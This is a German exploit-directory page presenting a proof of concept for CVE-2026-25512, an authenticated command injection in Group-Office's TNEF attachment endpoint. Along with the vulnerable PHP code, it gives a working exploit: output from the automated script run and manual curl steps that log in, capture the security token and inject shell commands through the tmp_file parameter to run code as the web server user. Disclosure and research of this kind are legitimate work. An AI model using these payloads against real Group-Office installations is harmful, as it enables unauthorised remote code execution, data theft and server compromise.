Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25512 — RCE - Befehlsinjektion über den TNEF-Anhang-Handler | Kitploit
Tools/GitHubGitHub/numberoreo1/cve-2026-25512
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnumberoreo1/cve-2026-25512

CVE-2026-25512

RCE - Befehlsinjektion über den TNEF-Anhang-Handler

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25512: Remote Code Execution durch Command Injection im TNEF-Handler - Group-Office

CVE-2026-25512 Critical CVSS 9.4

CWE-78

CVSS-4.0-Vektor : CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Inhaltsverzeichnis

  • Zusammenfassung
  • Betroffene Versionen
  • Technische Details
    • Grundursache
    • Quelle-zu-Senke-Fluss
  • Ausnutzung
    • Automatisierter Exploit
    • Manueller Exploit
  • Auswirkungen
  • Zeitleiste
Tool herunterladen
  • Danksagungen
  • Referenzen

  • Zusammenfassung

    Eine kritische Remote Code Execution (RCE)-Schwachstelle wurde in Group-Office identifiziert. Der Endpunkt email/message/tnefAttachmentFromTempFile verkettet den benutzerkontrollierten Parameter tmp_file direkt in einen exec()-Aufruf. Durch das Injizieren von Shell-Metazeichen in tmp_file kann ein authentifizierter Angreifer beliebige Systembefehle auf dem Server ausführen.


    Betroffene Versionen

    ProduktBetroffene Versionen
    Group-Office≤ 26.0.4

    Technische Details

    Grundursache

    Der Parameter tmp_file wird aus der HTTP-Anfrage übernommen und verwendet, um einen Shell-Befehl ohne Escaping oder Validierung zu erstellen. Dies führt zu einer Befehlsinjektion in den tnef-Extraktionsbefehl, der mit den Rechten des Webservers ausgeführt wird.

    Verwundbarer Code (www/modules/email/controller/MessageController.php):

    root@kitploit:~
    protected function actionTnefAttachmentFromTempFile(array $params)
    {
        $tmpFolder = \GO\Base\Fs\Folder::tempFolder(uniqid(time()));
        $tmpFile = new \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file']);
    
        chdir($tmpFolder->path());
        exec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), $output, $retVar);
        if($retVar!=0)
            throw new \Exception("TNEF extraction failed: ".implode("\n", $output));
    
        exec(GO::config()->cmd_zip.' -r "winmail.zip" *', $output, $retVar);
        if($retVar!=0)
            throw new \Exception("ZIP compression failed: ".implode("\n", $output));
    
        $zipFile = $tmpFolder->child('winmail.zip');
        \GO\Base\Util\Http::outputDownloadHeaders($zipFile,false,true);
        $zipFile->output();
    
        $tmpFolder->delete();
    }
    

    Quelle-zu-Senke-Fluss

    StufeBeschreibung
    Quelletmp_file-Query-Parameter in index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=...
    Ausbreitungnew \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file'])
    Senkeexec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), ...)

    Da tmp_file in den Shell-Befehl verkettet wird, ermöglichen Metazeichen wie ;, &, Backticks oder $() einem Angreifer, beliebige Befehle anzuhängen.

    Authentifizierungsanforderung: Ja. MessageController erzwingt eine security_token-CSRF-Prüfung, daher sind eine gültige Sitzung und ein gültiges Token erforderlich.


    Ausnutzung

    Automatisierter Exploit

    Das PoC-Skript meldet sich an, ruft das security_token ab, injiziert eine Nutzlast über tmp_file und verifiziert die Ausführung durch Lesen von rce.txt aus der ZIP-Antwort.

    root@kitploit:~
    python3 poc.py
    

    Beispielausgabe:

    root@kitploit:~
    ➜  ~ python3 poc.py
    [*] Target: http://xx.xx.xxx.xxx:9090
    [*] Login status: 200
    [*] Login ok, security_token received
    [*] Exploit URL: http://xx.xx.xxx.xxx:9090/index.php?r=email/message/tnefAttachmentFromTempFile
    [*] tmp_file payload: dummy.dat;id > /tmp/id;id > rce.txt;echo RCE_POC_451a735c >> rce.txt;#
    [*] Response status: 200
    [+] RCE Confirmed
    [+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    Manueller Exploit

    Schritt 1: Anmeldung

    root@kitploit:~
    curl -c cookies.txt -b cookies.txt "http://TARGET:PORT/index.php" \
        --data-urlencode "r=core/auth/login" \
        --data-urlencode "username=YOUR_USERNAME" \
        --data-urlencode "password=YOUR_PASSWORD" \
        -H "X-Requested-With: XMLHttpRequest"
    

    Antwort:

    root@kitploit:~
    {
      "success": true,
      "groupoffice_version": "26.0.4",
      "user_id": 2,
      "security_token": "XXXXXXX",
      "sid": "XXXXXXXXXXX"
    }
    

    Schritt 2: RCE auslösen

    root@kitploit:~
    curl -G "http://TARGET:PORT/index.php" \
        -b cookies.txt \
        --data-urlencode "r=email/message/tnefAttachmentFromTempFile" \
        --data-urlencode "security_token=YOUR_TOKEN" \
        --data-urlencode "tmp_file=dummy.dat;id > rce.txt || true;#" \
        -o command_output.zip
    

    Ergebnis:

    root@kitploit:~
    ➜  unzip command_output.zip
    Archive:  command_output.zip
      inflating: rce.txt
    
    ➜  cat rce.txt
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    Auswirkungen

    KategorieSchweregradBeschreibung
    VertraulichkeitHochBeliebige Befehlsausführung ermöglicht das Lesen vertraulicher Dateien.
    IntegritätHochAngreifer kann Serverdateien ändern oder löschen.
    VerfügbarkeitHochAngreifer kann Dienste stören oder kritische Daten löschen.

    Danksagungen

    • Entdeckt von: Oreo

    Referenzen

    • Offizielle Group-Office-Website
    • MITRE CVE-2026-25512